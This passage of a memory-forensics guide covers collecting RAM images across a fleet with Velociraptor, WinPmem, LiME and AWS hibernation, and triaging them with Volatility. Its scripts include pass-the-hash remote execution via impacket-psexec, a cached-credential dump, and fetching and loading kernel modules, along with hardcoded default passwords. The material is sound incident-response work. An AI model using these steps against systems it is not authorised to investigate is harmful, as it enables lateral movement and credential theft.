## MEMORY COLLECTION RUNBOOK
## Version: 1.0 | Last Updated: 2026-01
## PHASE 1: DECISION AND SCOPING (5 minutes)
##
## 1. Run network impact estimation
python3 /srv/memory/network_impact.py \
--tier1-count 2 --tier1-ram 64 \
--tier2-count 10 --tier2-ram 32 \
--tier3-count 38 --tier3-ram 16 \
--link-speed-mbps 1000 \
--max-utilisation 0.30
## 2. Verify analysis server capacity
df -h /srv/memory/landing # Check storage available
free -h # Check RAM
nproc # Check CPU count
## 3. Verify pipeline is running
cd /srv/memory && docker-compose ps
systemctl status memory-watcher
## PHASE 2: CONFIGURE AND LAUNCH COLLECTION (10 minutes)
##
## 4. Update target list for this incident
cat > /srv/memory/targets_$(date +%Y%m%d).json << 'TARGETS'
{
"incident_id": "INC-2026-001",
"started_at": "2026-05-15T09:00:00Z",
"targets": [
{"hostname": "DC01", "client_id": "C.xxx", "tier": 1, "ram_gb": 64, "priority": true},
{"hostname": "DC02", "client_id": "C.yyy", "tier": 1, "ram_gb": 64},
{"hostname": "FILE01", "client_id": "C.zzz", "tier": 2, "ram_gb": 32},
{"hostname": "WS-JOHN", "client_id": "C.aaa", "tier": 3, "ram_gb": 16, "priority": true}
]
}
TARGETS
## 5. Launch orchestrated collection
python3 /srv/memory/collection_orchestrator.py \
--targets /srv/memory/targets_$(date +%Y%m%d).json \
--config /etc/velociraptor/server.config.yaml
## PHASE 3: MONITOR PROGRESS (ongoing)
##
## 6. Watch pipeline status
watch -n 30 'psql postgresql://analyst:changeme@localhost/memory_analysis \
-c "SELECT hostname, status, risk_score FROM memory_images \
LEFT JOIN triage_results tr ON tr.image_id=memory_images.id \
ORDER BY risk_score DESC NULLS LAST;"'
## 7. Open analyst dashboard
echo "Dashboard: http://$(hostname -I | awk '{print $1}'):8080"
echo "Celery monitor: http://$(hostname -I | awk '{print $1}'):5555"
## 8. Monitor network utilisation on analysis server
sar -n DEV 5 | grep eth0
## PHASE 4: TRIAGE RESULTS AS THEY ARRIVE (ongoing)
##
## 9. Query for completed high-risk hosts immediately
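psql postgresql://analyst:changeme@localhost/memory_analysis << 'QUERY'
-- Columns shown are a suggestion; select whatever your triage needs
SELECT mi.hostname, mi.tier, tr.risk_score
FROM memory_images mi
JOIN triage_results tr ON tr.image_id = mi.id
WHERE tr.risk_score >= 20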
AND mi.status = 'complete'
ORDER BY tr.risk_score DESC;
QUERY
## 10. Run fleet correlation once 50%+ of images are complete
python3 /srv/memory/cross_correlation.py
## 11. Review fleet report
cat /srv/memory/reports/fleet_correlation.json | python3 -m json.tool | head -100
## PHASE 5: DEEP DIVE ON PRIORITY HOSTS
##
## 12. For any CRITICAL host, run additional Volatility plugins manually
IMAGE=$(psql postgresql://analyst:changeme@localhost/memory_analysis \
-t -c "SELECT image_path FROM memory_images WHERE hostname='DC01';" | tr -d ' ')
source /opt/vol3-env/bin/activate
# Additional plugins not in the automated pipeline
vol -f $IMAGE windows.cmdline # All process command lines
vol -f $IMAGE windows.dlllist --pid 123 # DLLs in specific PID
vol -f $IMAGE windows.handles --pid 123 # Open handles
vol -f $IMAGE windows.svcscan # Service enumeration
vol -f $IMAGE windows.drivermodule # Kernel driver verification
vol -f $IMAGE windows.timers # Kernel timer objects (rootkit indicator)
vol -f $IMAGE windows.registry.hivescan # Registry hive locations
vol -f $IMAGE windows.cachedump # Cached domain credentials
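The capacity check in Phase 1 of the runbook can be tied to the target list from Phase 2, so the storage requirement is calculated rather than eyeballed. This is a minimal sketch: the function names, the `image_ratio` of 1.0 (worst case, image as large as RAM), and the 1.5x headroom factor are all assumptions to adjust for your environment.

```python
import shutil


def estimated_image_gb(targets: list, image_ratio: float = 1.0) -> float:
    """Sum expected image sizes from the targets list (GB)."""
    return sum(t['ram_gb'] for t in targets) * image_ratio


def has_capacity(required_gb: float, free_gb: float, headroom: float = 1.5) -> bool:
    """Require spare room for reports, temp files, and retries."""
    return free_gb >= required_gb * headroom


# Same shape as the "targets" array in the runbook's JSON file.
targets = [
    {"hostname": "DC01", "tier": 1, "ram_gb": 64},
    {"hostname": "DC02", "tier": 1, "ram_gb": 64},
    {"hostname": "FILE01", "tier": 2, "ram_gb": 32},
    {"hostname": "WS-JOHN", "tier": 3, "ram_gb": 16},
]
required = estimated_image_gb(targets)
# '.' stands in for the landing directory in this demo.
free = shutil.disk_usage('.').free / 1e9
print(f"Need ~{required:.0f} GB, free {free:.0f} GB, ok={has_capacity(required, free)}")
```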
Storage management and image lifecycle
Memory images are large. Fifty images from a typical enterprise investigation consume between 600GB and 2.5TB of storage. Without lifecycle management the analysis server fills up, and raw memory images contain sensitive data (credentials, encryption keys, personal information from user sessions) that should not persist indefinitely.
## storage_lifecycle.py - Automated image lifecycle management
#!/usr/bin/env python3
"""
Manages memory image storage lifecycle:
- Moves completed images to cold storage after analysis
- Archives reports to long-term storage
- Securely deletes raw images after retention period
- Compresses reports for long-term retention
"""
import os
import shutil
import logging
import psycopg2
from datetime import datetime, timedelta
from pathlib import Path
log = logging.getLogger(__name__)
POSTGRES_URL = 'postgresql://analyst:changeme@localhost/memory_analysis'
# Configuration
HOT_STORAGE = Path('/srv/memory/landing') # Fast NVMe
COLD_STORAGE = Path('/srv/memory/archive') # Slower HDD
REPORT_ARCHIVE = Path('/srv/memory/reports/archive')
RETENTION_DAYS = 90 # Keep raw images for 90 days after analysis complete
def get_db():
return psycopg2.connect(POSTGRES_URL)
def move_to_cold_storage():
"""Move completed and analysed images to slower cold storage."""
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("""
SELECT id, hostname, image_path
FROM memory_images
WHERE status = 'complete'
AND image_path LIKE %s
AND received_at < NOW() - INTERVAL '24 hours'
""", (str(HOT_STORAGE) + '%',))
rows = cur.fetchall()
for image_id, hostname, image_path in rows:
src = Path(image_path)
if not src.exists():
continue
dest_dir = COLD_STORAGE / hostname
dest_dir.mkdir(parents=True, exist_ok=True)
dest = dest_dir / src.name
log.info(f"Moving {hostname} image to cold storage: {src.stat().st_size / 1e9:.1f}GB")
shutil.move(str(src), str(dest))
with get_db() as conn:
with conn.cursor() as cur:
cur.execute(
"UPDATE memory_images SET image_path = %s WHERE id = %s",
(str(dest), image_id)
)
conn.commit()
def purge_expired_images():
    """Overwrite and delete raw images older than the retention period."""
    cutoff = datetime.now() - timedelta(days=RETENTION_DAYS)
    with get_db() as conn:
        with conn.cursor() as cur:
            cur.execute("""
                SELECT id, hostname, image_path
                FROM memory_images
                WHERE status = 'complete'
                AND received_at < %s
                AND image_path IS NOT NULL
            """, (cutoff,))
            rows = cur.fetchall()
    chunk_size = 1024 * 1024  # overwrite in 1MB chunks
    for image_id, hostname, image_path in rows:
        img = Path(image_path)
        if not img.exists():
            continue
        size_gb = img.stat().st_size / 1e9
        log.info(f"Purging expired image: {hostname} ({size_gb:.1f}GB, ID {image_id})")
        # Best-effort secure deletion: overwrite the whole file before removing it.
        # For SSDs and copy-on-write filesystems this is limited in effectiveness -
        # consider full-disk encryption instead
        try:
            remaining = img.stat().st_size
            with open(img, 'r+b') as f:
                while remaining > 0:
                    n = min(chunk_size, remaining)
                    f.write(os.urandom(n))
                    remaining -= n
                f.flush()
                os.fsync(f.fileno())  # make sure the overwrite reaches the disk
            img.unlink()
            log.info(f"Purged: {hostname}")
        except Exception as e:
            log.error(f"Purge failed for {hostname}: {e}")
            continue
        with get_db() as conn:
            with conn.cursor() as cur:
                cur.execute(
                    "UPDATE memory_images SET image_path = NULL, status = 'purged' WHERE id = %s",
                    (image_id,)
                )
            conn.commit()
def archive_reports():
"""Compress and archive reports older than 7 days."""
import tarfile
cutoff = datetime.now() - timedelta(days=7)
REPORT_ARCHIVE.mkdir(parents=True, exist_ok=True)
for report_dir in Path('/srv/memory/reports').iterdir():
if not report_dir.is_dir() or report_dir == REPORT_ARCHIVE:
continue
mtime = datetime.fromtimestamp(report_dir.stat().st_mtime)
if mtime < cutoff:
archive_name = REPORT_ARCHIVE / f"{report_dir.name}_{mtime.strftime('%Y%m%d')}.tar.gz"
with tarfile.open(archive_name, 'w:gz') as tar:
tar.add(report_dir, arcname=report_dir.name)
shutil.rmtree(report_dir)
log.info(f"Archived reports for {report_dir.name}")
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s %(message)s')
log.info("Running storage lifecycle management")
move_to_cold_storage()
purge_expired_images()
archive_reports()
log.info("Storage lifecycle complete")
## Cron schedule for lifecycle management
## Add to /etc/cron.d/memory-pipeline
# Run lifecycle management at 3am daily
0 3 * * * analyst /opt/vol3-env/bin/python3 /srv/memory/storage_lifecycle.py >> /srv/memory/logs/lifecycle.log 2>&1
# Compile and deploy Yara rules at midnight
0 0 * * * analyst /opt/vol3-env/bin/python3 /srv/memory/compile_rules.py >> /srv/memory/logs/rules.log 2>&1
# Run fleet correlation every 2 hours during business hours
0 8,10,12,14,16,18 * * 1-5 analyst /opt/vol3-env/bin/python3 /srv/memory/cross_correlation.py >> /srv/memory/logs/correlation.log 2>&1
Performance tuning and benchmarks
With the full pipeline running, the throughput you can expect depends on your analysis server hardware. The script below measures per-plugin timings on your own server; its capacity estimates assume a test deployment with 32 cores, 128GB RAM, and NVMe storage.
## Pipeline performance benchmark script
## Run this against a test image to measure your pipeline throughput
#!/usr/bin/env python3
import subprocess, time, json
from pathlib import Path
def benchmark_volatility_plugins(image_path: str):
plugins = [
('windows.pslist', 'Process list'),
('windows.netscan', 'Network connections'),
('windows.malfind', 'Injection detection'),
('windows.callbacks', 'Kernel callbacks'),
('windows.cmdline', 'Command lines'),
('windows.dlllist', 'Module list'),
]
print(f"Benchmarking Volatility 3 against: {image_path}")
print(f"Image size: {Path(image_path).stat().st_size / 1e9:.1f} GB\n")
print(f"{'Plugin':<30} {'Time (s)':<12} {'Records':<10}")
print("-" * 55)
total_time = 0
for plugin, description in plugins:
start = time.time()
result = subprocess.run(
['/opt/vol3-env/bin/vol', '-f', image_path,
'--renderer', 'json', plugin],
capture_output=True, text=True, timeout=600
)
elapsed = time.time() - start
total_time += elapsed
try:
data = json.loads(result.stdout)
count = len(data.get('rows', data)) if isinstance(data, dict) else len(data)
except (json.JSONDecodeError, TypeError):
count = 0
print(f"{plugin:<30} {elapsed:<12.1f} {count:<10}")
print("-" * 55)
print(f"{'TOTAL':<30} {total_time:<12.1f}")
print(f"\nFull triage pipeline: ~{total_time/60:.1f} minutes per image")
print(f"Parallel capacity (32 cores): ~{int(32 / 4)} images simultaneously")
print(f"Estimated fleet throughput: ~{int((32/4) * (3600/total_time))} images/hour")
if __name__ == '__main__':
import sys
if len(sys.argv) < 2:
print("Usage: benchmark.py <image_path>")
sys.exit(1)
benchmark_volatility_plugins(sys.argv[1])
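The throughput arithmetic at the end of the benchmark can be turned into a small planning helper. This sketch keeps the script's assumption of four cores per image; the function names are hypothetical, and the 900-second triage time used in the demo is an illustrative input, not a measured result.

```python
import math


def fleet_throughput(total_seconds: float, cores: int = 32,
                     cores_per_image: int = 4):
    """Return (images processed in parallel, images per hour)."""
    if total_seconds <= 0:
        raise ValueError("total_seconds must be positive")
    parallel = max(1, cores // cores_per_image)
    return parallel, parallel * 3600 / total_seconds


def hours_for_fleet(image_count: int, total_seconds: float,
                    cores: int = 32, cores_per_image: int = 4) -> float:
    """Wall-clock hours to triage a fleet, processed in parallel waves."""
    parallel, _ = fleet_throughput(total_seconds, cores, cores_per_image)
    waves = math.ceil(image_count / parallel)
    return waves * total_seconds / 3600


parallel, per_hour = fleet_throughput(900)
print(f"{parallel} images in parallel, {per_hour:.0f} images/hour")
print(f"50 images: {hours_for_fleet(50, 900):.2f} hours")
```

Feed in the `total_time` value the benchmark prints for your own hardware rather than relying on the demo figure.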
Putting the complete pipeline together
Everything described in this post forms a coherent system when deployed together. Velociraptor provides the collection layer with configurable throttling and tiered concurrency to protect the production network. The image watcher provides the trigger layer, detecting new images and starting the processing chain without manual intervention. Celery and the task pipeline provide the processing layer, automatically running triage and deep analysis in sequence, storing structured results in PostgreSQL. Cross-image correlation provides the intelligence layer, connecting findings across all machines to identify the full scope of an intrusion. The Flask dashboard provides the analyst interface for reviewing results under incident pressure. GitHub Actions provides the operational layer, keeping the Yara ruleset current and deployed without manual SSH sessions.
The network protection considerations are baked into every collection decision: tiered concurrency limits based on available bandwidth, per-client throttling, QoS marking for de-prioritisation under load, and off-hours scheduling for non-urgent collections. A well-tuned deployment of this pipeline running on a 1Gbps network can collect from 50 endpoints within a six-to-eight hour window while keeping collection-related bandwidth below 30% of the available link capacity throughout.
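The six-to-eight hour figure can be sanity-checked with simple arithmetic. The sketch below is an approximation under stated assumptions: decimal units (1GB = 8,000 megabits), no protocol overhead, and a hypothetical helper name `transfer_hours`. The example fleet is the 2/10/38 tier split from the runbook, treated as worst case with images as large as RAM.

```python
def transfer_hours(total_gb: float, link_mbps: float, max_utilisation: float) -> float:
    """Hours needed to move total_gb while capped at a share of the link."""
    usable_mbps = link_mbps * max_utilisation
    if usable_mbps <= 0:
        raise ValueError("link speed and utilisation cap must be positive")
    total_megabits = total_gb * 8000  # decimal GB to megabits
    return total_megabits / usable_mbps / 3600


# Runbook example: 2 x 64GB, 10 x 32GB, 38 x 16GB endpoints.
fleet_ram_gb = 2 * 64 + 10 * 32 + 38 * 16
hours = transfer_hours(fleet_ram_gb, link_mbps=1000, max_utilisation=0.30)
print(f"{fleet_ram_gb} GB at 30% of 1Gbps: {hours:.1f} hours")
```

Compression reduces the volume and therefore the time; real transfers also lose some throughput to protocol overhead, so treat the result as a planning estimate.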
The most important principle in fleet memory analysis is that speed matters but correctness matters more. A partial or interrupted memory image is worse than no image because it gives false confidence. The validation stage in the pipeline exists for a reason: verifying SHA256 and image size before analysis starts catches failed transfers early rather than after significant CPU time has been spent on an incomplete image. Never skip validation under time pressure.
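A validation check of this kind can be sketched in a few lines. This is not the pipeline's own validation task; `sha256_file` and `check_image` are hypothetical names, and the sketch assumes the collector recorded the expected hash and size at acquisition time. The size is checked first because it is cheap and catches truncated transfers before any hashing starts.

```python
import hashlib
from pathlib import Path


def sha256_file(path, chunk_size: int = 8 * 1024 * 1024) -> str:
    """Hash a file in chunks so large images never load fully into RAM."""
    digest = hashlib.sha256()
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(chunk_size), b''):
            digest.update(chunk)
    return digest.hexdigest()


def check_image(path, expected_sha256: str, expected_size: int):
    """Return (ok, reason). Cheap checks run before the expensive hash."""
    p = Path(path)
    if not p.is_file():
        return False, 'missing'
    actual_size = p.stat().st_size
    if actual_size != expected_size:
        return False, f'size mismatch: {actual_size} != {expected_size}'
    if sha256_file(p) != expected_sha256.lower():
        return False, 'sha256 mismatch'
    return True, 'ok'
```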
Everything here is designed to be adapted. Your environment has different endpoint counts, different network topology, different hardware constraints, and different Velociraptor deployment configurations than the examples used throughout. The scripts are starting points rather than finished products. The architecture, the tiering logic, the processing stages, and the correlation approach are the durable parts. The specific Python code is intended to give you a working foundation to build from rather than a drop-in solution that works without modification.
Alternative collection method 1: WinPmem standalone (no agent required)
Velociraptor is the right answer when you have agents deployed. When you do not, whether because the endpoint was newly discovered, because the Velociraptor agent failed, or because you are working in an environment where agent deployment is not possible, WinPmem can be run directly as a standalone executable with no installation required. It is a single binary, runs from a USB drive or a UNC path, and produces a raw memory image that the analysis pipeline accepts without modification.
The critical operational detail with standalone WinPmem is output staging. Avoid writing the image to the target system’s own disk where possible. If you write a 16GB image to C:\Windows\Temp you are adding 16GB of write activity to a potentially compromised system, potentially overwriting slack space that contains forensic evidence, and relying on the target disk having enough free space. Writing directly to a network share or an external drive avoids all of these problems.
## WinPmem standalone collection
## Download: https://github.com/Velocidex/WinPmem/releases
## Option 1: Write directly to a network share (preferred)
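## The share should be on your analysis server, ideally write-only for the target
# On a Windows analysis server - create the collection share.
# Note: CHANGE grants read as well as write; use NTFS ACLs on the folder to enforce write-only access
net share MemCollection=C:\MemCollection /GRANT:"Everyone,CHANGE"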
# Or on Linux analysis server via Samba:
# [MemCollection]
# path = /srv/memory/landing
# writable = yes
# create mask = 0644
# guest ok = yes # Only on isolated IR network
## On the target Windows system (run as Administrator):
winpmem_mini_x64.exe \\analysis-server\MemCollection\%COMPUTERNAME%_%DATE:~-4%%DATE:~3,2%%DATE:~0,2%.raw
## Option 2: Write locally then transfer (when network share unavailable)
winpmem_mini_x64.exe C:\Windows\Temp\mem.raw
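## Transfer with throttled robocopy (/IPG:1 inserts a 1 ms inter-packet gap; the effective rate depends on the link, so measure it and raise the value to throttle harder)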
robocopy C:\Windows\Temp \\analysis-server\MemCollection mem.raw /J /IPG:1
## Option 3: Pipe directly to compressed output (reduces disk footprint)
winpmem_mini_x64.exe - | gzip -1 > \\analysis-server\MemCollection\%COMPUTERNAME%.raw.gz
## Wrapper script for multiple standalone targets
## Run from the analysis server via PsExec or similar remote execution
#!/usr/bin/env python3
"""
Standalone WinPmem deployment script for environments without Velociraptor.
Copies WinPmem to target via admin share, runs acquisition, transfers image.
"""
import subprocess
import time
import logging
from pathlib import Path
from datetime import datetime
log = logging.getLogger(__name__)
WINPMEM_PATH = '/srv/memory/tools/winpmem_mini_x64.exe'
LANDING_DIR = '/srv/memory/landing'
# Credentials are read from the smbclient auth file (/etc/memory-ir/smb.auth).
# Keep secrets in a vault or a root-only file, never in source code.
def collect_standalone(hostname: str, ram_gb: float = 16) -> bool:
"""Deploy WinPmem to a target and collect memory."""
timestamp = datetime.now().strftime('%Y%m%d_%H%M%S')
output_name = f"{hostname}_{timestamp}.raw"
output_unc = f"\\\\{hostname}\\C$\\Windows\\Temp\\mem_ir.raw"
local_dest = f"{LANDING_DIR}/{output_name}"
log.info(f"Starting standalone collection from {hostname}")
# Step 1: Copy WinPmem to target via admin share
copy_cmd = [
'smbclient', f'//{hostname}/C$',
'-A', '/etc/memory-ir/smb.auth', # credentials file
'-c', f'put {WINPMEM_PATH} Windows\\Temp\\winpmem.exe'
]
result = subprocess.run(copy_cmd, capture_output=True, text=True, timeout=60)
if result.returncode != 0:
log.error(f"Failed to copy WinPmem to {hostname}: {result.stderr}")
return False
# Step 2: Execute WinPmem remotely via impacket psexec
# Estimate time: roughly 1 minute per 4GB of RAM at ~70MB/s write speed
timeout = int((ram_gb / 4) * 60) + 120
exec_cmd = [
'impacket-psexec',
'-hashes', 'LMHASH:NTHASH', # placeholder: fetch the real hash from a vault at runtime
f'domain/iruser@{hostname}',
f'C:\\Windows\\Temp\\winpmem.exe C:\\Windows\\Temp\\mem_ir.raw'
]
log.info(f"Running WinPmem on {hostname} (estimated {timeout//60} min)")
result = subprocess.run(exec_cmd, capture_output=True, text=True, timeout=timeout)
if result.returncode != 0:
log.error(f"WinPmem execution failed on {hostname}")
return False
# Step 3: Transfer the image back
log.info(f"Transferring image from {hostname}")
transfer_cmd = [
'smbclient', f'//{hostname}/C$',
'-A', '/etc/memory-ir/smb.auth',
'-c', f'get Windows\\Temp\\mem_ir.raw {local_dest}'
]
result = subprocess.run(transfer_cmd, capture_output=True, text=True,
timeout=7200) # 2 hour timeout for transfer
if result.returncode != 0:
log.error(f"Transfer failed from {hostname}: {result.stderr}")
return False
# Step 4: Clean up temp files on target
cleanup_cmd = [
'smbclient', f'//{hostname}/C$',
'-A', '/etc/memory-ir/smb.auth',
'-c', 'del Windows\\Temp\\winpmem.exe; del Windows\\Temp\\mem_ir.raw'
]
subprocess.run(cleanup_cmd, capture_output=True, timeout=30)
log.info(f"Standalone collection complete: {local_dest}")
return True
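To run the collection against several hosts without saturating the network, the per-host function can be driven by a bounded thread pool. This is a minimal sketch: `collect_fleet` is a hypothetical name, the default of three parallel collections is an assumption to tune against your bandwidth budget, and the collector is passed in as a callable with the same `(hostname, ram_gb)` signature as `collect_standalone`.

```python
from concurrent.futures import ThreadPoolExecutor, as_completed


def collect_fleet(hosts, collect_fn, max_parallel: int = 3) -> dict:
    """Run collect_fn(hostname, ram_gb) per host, at most max_parallel at once.

    Returns {hostname: True/False}. An exception in one collection is
    recorded as a failure and does not stop the others.
    """
    results = {}
    with ThreadPoolExecutor(max_workers=max_parallel) as pool:
        futures = {
            pool.submit(collect_fn, h['hostname'], h.get('ram_gb', 16)): h['hostname']
            for h in hosts
        }
        for future in as_completed(futures):
            hostname = futures[future]
            try:
                results[hostname] = bool(future.result())
            except Exception:
                results[hostname] = False
    return results


# Usage with the function above (not executed here):
#   collect_fleet([{'hostname': 'WS-JOHN', 'ram_gb': 16}], collect_standalone)
```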
Alternative collection method 2: LiME for Linux endpoints
Linux memory acquisition requires a different approach because there is no WinPmem equivalent that works across all kernel versions without compilation. LiME (Linux Memory Extractor) is a loadable kernel module that, when inserted, exposes physical memory through a network socket or a local file. The challenge is that LiME must be compiled against the exact kernel version running on the target, which means maintaining a library of pre-compiled modules or building on demand.
The build-on-demand approach is more maintainable for a fleet where kernel versions vary across different distro versions and patch levels. A build server with Docker can compile the correct LiME module for any target kernel version in under two minutes.
## LiME build server setup
## Builds LiME modules for arbitrary kernel versions on demand
#!/bin/bash
## build_lime.sh - Build LiME for a specific kernel version
## Usage: ./build_lime.sh 5.15.0-91-generic ubuntu:22.04
KERNEL_VERSION=$1
DOCKER_IMAGE=${2:-ubuntu:22.04}
OUTPUT_DIR=/srv/memory/lime_modules
mkdir -p $OUTPUT_DIR
docker run --rm \
-v $OUTPUT_DIR:/output \
-e KERNEL_VERSION=$KERNEL_VERSION \
$DOCKER_IMAGE bash -c "
apt-get update -qq
apt-get install -y -qq \
linux-headers-$KERNEL_VERSION \
build-essential \
git 2>/dev/null
git clone --depth 1 https://github.com/504ensicsLabs/LiME /tmp/lime
cd /tmp/lime/src
make -C /lib/modules/$KERNEL_VERSION/build M=\$(pwd) modules
cp lime.ko /output/lime-$KERNEL_VERSION.ko
echo '[+] Built: lime-$KERNEL_VERSION.ko'
"
echo "Module available at: $OUTPUT_DIR/lime-$KERNEL_VERSION.ko"
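Before an incident, it helps to know which kernel versions in the fleet still lack a pre-built module. The sketch below assumes the `lime-<kernel>.ko` naming used by the build script; the function names and the idea of feeding in a list of kernel versions gathered from your inventory are illustrative assumptions.

```python
from pathlib import Path


def lime_module_path(kernel_version: str, module_dir) -> Path:
    """Path where the build script writes the module for a kernel."""
    return Path(module_dir) / f"lime-{kernel_version}.ko"


def missing_modules(kernel_versions, module_dir) -> list:
    """Return the sorted, de-duplicated kernels with no built module."""
    return sorted({
        kv for kv in kernel_versions
        if not lime_module_path(kv, module_dir).is_file()
    })


# Example: kernel versions as reported by `uname -r` across the fleet.
fleet_kernels = ['5.15.0-91-generic', '5.15.0-91-generic', '6.5.0-14-generic']
for kv in missing_modules(fleet_kernels, '/srv/memory/lime_modules'):
    print(f"./build_lime.sh {kv}")
```

Printing the build commands rather than running them keeps the check side-effect free; pipe the output to a shell once you have reviewed it.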
## Linux memory collection script using LiME
## Run as root on the target Linux system
#!/bin/bash
## collect_linux_memory.sh
set -euo pipefail
ANALYSIS_SERVER="192.168.1.100"
COLLECTION_PORT="4444"
KERNEL_VER=$(uname -r)
HOSTNAME=$(hostname -s)
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
MODULE_DIR="/tmp/lime_modules"
OUTPUT_FILE="/tmp/mem_${HOSTNAME}_${TIMESTAMP}.lime"
echo "[*] Linux memory collection starting"
echo " Hostname: $HOSTNAME"
echo " Kernel: $KERNEL_VER"
echo " RAM: $(free -h | awk '/^Mem:/{print $2}')"
# Check if pre-built module exists locally
if [ -f "$MODULE_DIR/lime-$KERNEL_VER.ko" ]; then
echo "[*] Using pre-built module"
LIME_MODULE="$MODULE_DIR/lime-$KERNEL_VER.ko"
else
echo "[*] Fetching pre-built module from build server"
mkdir -p $MODULE_DIR
wget -q "http://$ANALYSIS_SERVER:8888/lime/lime-$KERNEL_VER.ko" \
-O "$MODULE_DIR/lime-$KERNEL_VER.ko" 2>/dev/null || {
echo "[!] Module not available for kernel $KERNEL_VER"
echo "[!] Build it first: ./build_lime.sh $KERNEL_VER"
exit 1
}
LIME_MODULE="$MODULE_DIR/lime-$KERNEL_VER.ko"
fi
# Option A: Acquire to file then transfer (for large images or slow networks)
echo "[*] Acquiring memory to local file"
insmod $LIME_MODULE "path=$OUTPUT_FILE format=lime timeout=0"
rmmod lime
echo "[*] Image size: $(du -sh $OUTPUT_FILE | cut -f1)"
echo "[*] SHA256: $(sha256sum $OUTPUT_FILE | cut -d' ' -f1)"
# Transfer over SSH, throttled with pv to avoid network saturation
# pv -L 50m caps the stream at 50 MiB/s; if pv is unavailable, replace it with cat (unthrottled)
echo "[*] Transferring to analysis server"
pv -L 50m "$OUTPUT_FILE" | \
ssh analyst@$ANALYSIS_SERVER \
"cat > /srv/memory/landing/${HOSTNAME}_${TIMESTAMP}.lime"
# Clean up local staging file
rm -f "$OUTPUT_FILE" "$LIME_MODULE"
echo "[+] Collection complete"
# Option B: Acquire directly over network (no local disk needed)
# Useful when target disk is nearly full or disk write should be avoided
# With path=tcp:<port>, LiME listens on the target and waits for a connection
# On target first:
# insmod lime.ko "path=tcp:4444 format=lime"
# Then on analysis server, connect to the target to pull the image:
# nc <target-ip> 4444 > hostname_timestamp.lime
# This streams memory directly to the analysis server
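An image written with format=lime is a sequence of memory ranges, each preceded by a 32-byte header (magic, version, start address, inclusive end address, 8 reserved bytes). Walking those headers is a cheap way to confirm that a transferred image is structurally complete before handing it to Volatility. The sketch below assumes that layout; the function name is illustrative.

```python
import io
import struct
from typing import BinaryIO, Iterator, Tuple

LIME_MAGIC = 0x4C694D45            # bytes "EMiL" on disk (little-endian)
HEADER = struct.Struct("<IIQQ8s")  # magic, version, start, end, reserved


def lime_ranges(stream: BinaryIO) -> Iterator[Tuple[int, int]]:
    """Yield (start, end) for each memory range; raise ValueError if damaged."""
    total = stream.seek(0, io.SEEK_END)   # file size in bytes
    stream.seek(0)
    while stream.tell() < total:
        raw = stream.read(HEADER.size)
        if len(raw) < HEADER.size:
            raise ValueError("truncated LiME header")
        magic, version, start, end, _reserved = HEADER.unpack(raw)
        if magic != LIME_MAGIC or version != 1:
            raise ValueError("unexpected LiME magic or version")
        payload_end = stream.tell() + (end - start + 1)   # end is inclusive
        if end < start or payload_end > total:
            raise ValueError("truncated LiME payload")
        stream.seek(payload_end)          # skip the payload without reading it
        yield start, end
```

Calling `list(lime_ranges(open(path, "rb")))` on a landed image either returns the captured physical ranges or raises, which makes it a reasonable pre-check for a file that may still have been mid-transfer.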
## Velociraptor artefact for Linux memory collection
## Handles module deployment and acquisition automatically
name: Custom.Linux.Memory.Acquire
description: |
Acquires Linux physical memory using LiME.
Downloads the correct kernel module from the build server,
loads it, captures memory, and uploads to Velociraptor server.
type: CLIENT
parameters:
- name: BuildServerURL
description: URL of the LiME module build/distribution server
default: "http://192.168.1.100:8888/lime"
- name: ThrottleMBps
description: Transfer throttle in MB/s
default: "10"
type: int
sources:
- name: LinuxMemoryAcquisition
query: |
-- Each step uses LET ... <= so it runs immediately; a plain LET is lazy
-- and a step that is never referenced later would not execute at all
LET kernel_rows <= SELECT Stdout FROM execve(argv=["uname", "-r"], sep="\n")
LET kernel_version <= kernel_rows[0].Stdout
LET info_rows <= SELECT Fqdn FROM info()
LET hostname <= info_rows[0].Fqdn
LET timestamp <= format(format="%d", args=[now()])
LET module_url <= format(format="%v/lime-%v.ko",
args=[BuildServerURL, kernel_version])
LET output_path <= format(format="/tmp/mem_%v_%v.lime",
args=[hostname, timestamp])
-- Download the LiME module for this kernel to a temp file;
-- Content holds the temp file path when tempfile_extension is set
LET download <= SELECT Content FROM http_client(
url=module_url,
method="GET",
tempfile_extension=".ko"
)
LET module_path <= download[0].Content
-- Load LiME and capture memory
LET capture <= SELECT * FROM execve(argv=[
"insmod", module_path,
format(format="path=%v format=lime timeout=0", args=[output_path])
])
-- Unload module
LET unload <= SELECT * FROM execve(argv=["rmmod", "lime"])
-- Upload, then clean up the staging file
LET uploaded <= SELECT upload(file=output_path,
name=format(format="%v_%v.lime", args=[hostname, timestamp])) AS Upload
FROM scope()
LET cleanup <= SELECT * FROM execve(argv=["rm", "-f", output_path])
SELECT * FROM uploaded
Alternative collection method 3: cloud-native collection (AWS and Azure)
Cloud instances present a fundamentally different collection challenge. Building a kernel module for an EC2 instance requires kernel headers that match the exact kernel the AMI is running, and network egress costs make large file transfers expensive. Snapshot-based collection sidesteps both problems by using the cloud provider’s own APIs, at the cost of briefly stopping the instance.
AWS has no API that snapshots instance memory directly; EBS snapshots capture disk only. The workaround for Windows EC2 instances is hibernation: stopping the instance with hibernation writes RAM to the root EBS volume, and a snapshot of that volume then contains the memory state. Hibernation must have been enabled when the instance was launched, so this only works on instances that were prepared in advance. For Linux, the approach is to use the SSM agent to run a collection script directly on the instance, similar to the standalone approach.
## AWS EC2 memory collection via snapshot
## Requires: boto3, appropriate IAM permissions
#!/usr/bin/env python3
"""
Cloud-native memory collection for AWS EC2 instances.
Uses EC2 Snapshot for Windows (requires hibernation enabled)
and SSM Run Command + LiME for Linux instances.
"""
import boto3
import time
import json
import logging
from datetime import datetime
from typing import Optional
log = logging.getLogger(__name__)
def collect_windows_ec2_snapshot(
instance_id: str,
region: str = 'ap-southeast-2',
s3_bucket: str = 'ir-memory-collection'
) -> Optional[str]:
"""
Capture Windows EC2 memory via hibernation snapshot.
NOTE: Instance must have hibernation enabled at launch time.
WARNING: This stops the instance temporarily.
"""
ec2 = boto3.client('ec2', region_name=region)
log.warning(f"Starting hibernation snapshot for {instance_id}")
log.warning("This will STOP the instance temporarily")
# Tag the instance for IR tracking
ec2.create_tags(
Resources=[instance_id],
Tags=[
{'Key': 'IR-Collection', 'Value': datetime.now().isoformat()},
{'Key': 'IR-Status', 'Value': 'collecting'}
]
)
# Stop with hibernation to preserve memory state in EBS
response = ec2.stop_instances(
InstanceIds=[instance_id],
Hibernate=True # Writes RAM to EBS volume
)
